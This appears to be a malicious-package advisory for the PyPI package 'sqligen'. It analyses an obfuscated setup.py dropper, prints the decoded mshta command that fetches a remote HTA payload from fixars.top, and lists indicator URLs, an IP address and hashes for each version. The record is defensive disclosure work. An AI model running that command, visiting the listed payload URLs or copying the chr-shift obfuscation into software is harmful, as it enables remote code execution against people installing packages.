-= Per source details. Do not edit below this line.=-
setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any pip install sqligen (or pip install -e.) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
tool:mshta
{
"iocs": {
"domains": [
"fixars.top"
],
"urls": [
"https://pastebin.com/raw/hEF5HaFc",
"https://pastebin.com/raw/yBcUM1QBs",
"https://pastebin.com/raw/yBcUM1QB",
"http://fixars.top",
"https://tmpfiles.org/dl/wawHVGgfydD7/6a306c5f03a52.exe",
"http://62.60.226.243/public_files/98r4aXA.txt",
"http://62.60.226.243/public_files/16sas.jpg?12711313"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-06-easyaillm/sqligen",
"import_time": "2026-06-26T10:34:51.116691576Z",
"modified_time": "2026-06-26T09:23:53.213083Z",
"sha256": "b84d9f4006cbb5db6790a6de402754f0937758e861efe6ec0bc3ba156415327c",
"source": "kam193",
"versions": [
"1.0.0",
"1.0.5",
"1.0.6",
"1.0.7",
"1.0.8",
"1.1.1",
"1.1.3",
"1.1.4"
]
},
{
"id": "IN-MAL-2026-007778",
"import_time": "2026-06-29T09:10:17.087639217Z",
"modified_time": "2026-06-29T07:45:17Z",
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
],
"sha256": "6757e6c11ba58c93d394399433beab9866ec37417e7b6217110e8dec3eefd22a",
"source": "amazon-inspector",
"versions": [
"1.0.7"
]
},
{
"id": "IN-MAL-2026-007777",
"import_time": "2026-06-29T09:10:16.979926704Z",
"modified_time": "2026-06-29T07:45:07Z",
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
],
"sha256": "de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196",
"source": "amazon-inspector",
"versions": [
"1.1.4"
]
},
{
"id": "IN-MAL-2026-008399",
"import_time": "2026-07-08T20:32:23.584577952Z",
"modified_time": "2026-07-08T20:04:31Z",
"sha256": "3a3e096836d992f01e091f3336e616533c580cb17f5d7eefca3c5d6ce8de7c26",
"source": "amazon-inspector",
"versions": [
"1.0.8"
]
},
{
"id": "IN-MAL-2026-008494",
"import_time": "2026-07-08T20:32:35.955475969Z",
"modified_time": "2026-07-08T20:19:05Z",
"sha256": "71b150d072ecf2c233da2da933c59c9eca60a5f537864bcf9f8ccb32892a75c2",
"source": "amazon-inspector",
"versions": [
"1.1.1"
]
},
{
"id": "IN-MAL-2026-008485",
"import_time": "2026-07-08T20:32:34.899687187Z",
"modified_time": "2026-07-08T20:17:39Z",
"sha256": "7f0a42f0f6a06c48ae2682290be0733216c10b9234853308a4f4af2198b9241c",
"source": "amazon-inspector",
"versions": [
"1.0.0"
]
},
{
"id": "IN-MAL-2026-008487",
"import_time": "2026-07-08T20:32:35.114335791Z",
"modified_time": "2026-07-08T20:18:02Z",
"sha256": "8dfee9192060012de61fdbda198e493bb6cb2646a25c1888063e6337201355b9",
"source": "amazon-inspector",
"versions": [
"1.0.5"
]
},
{
"id": "IN-MAL-2026-008490",
"import_time": "2026-07-08T20:32:35.533632167Z",
"modified_time": "2026-07-08T20:18:29Z",
"sha256": "c0b419353b77baa9e6a5dcc182a6ba9ae5c48f65a27a5306f6798c7b3a86db25",
"source": "amazon-inspector",
"versions": [
"1.0.6"
]
},
{
"id": "IN-MAL-2026-009176",
"import_time": "2026-07-09T16:20:48.329986552Z",
"modified_time": "2026-07-09T15:39:27Z",
"sha256": "188827064b2c53b37e21e32faa7ec5e59aed3872a59bfcabd087e7b6e75c6db4",
"source": "amazon-inspector",
"versions": [
"1.1.3"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "setup.py",
"sha256": "d8aab7c8f3cb71592b0189a4381a47659ce2719716eada3e4b82d130a152d1e9",
"tlsh": "55221987da670a71a7c643f0990717c67b75fa2b1a014474bdeec10c1f4a1ba83772ad"
},
{
"path": "PKG-INFO",
"sha256": "8b5c2f86b11617b4cefe83d4d769960a20138de71bf6cba908ab9bcc5b2bac12",
"tlsh": "5d31c5e125c699b43fd349456904a54add21da00ee8864d9ecf78a9f59442ad633e03c"
}
],
"package_integrity": [
{
"filename": "sqligen-1.0.7-py3-none-any.whl",
"hashes": {
"blake2b_256": "e9c19ca970b76dc76ae6169c862429bf847517f28e7c310ee05ffa2dc9cece7f",
"md5": "37319baa8518357c71445a11865cd751",
"sha256": "f618fb3e9817844227173b54ac45581e9544bd1fba7e71cfee898ab72a14f34f"
}
},
{
"filename": "sqligen-1.0.7.tar.gz",
"hashes": {
"blake2b_256": "055f483b64fe7b5e64b5f2b85d34e705b35ca5778525962d23a035248653fd80",
"md5": "b920246e4a18680183ea4e0ef160c320",
"sha256": "37394e15e1ca37c4e34c7c6b1d25361ac0f38a7f8bc03a133bd8466b0282bf6b"
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/sqligen/MAL-2026-6515.json"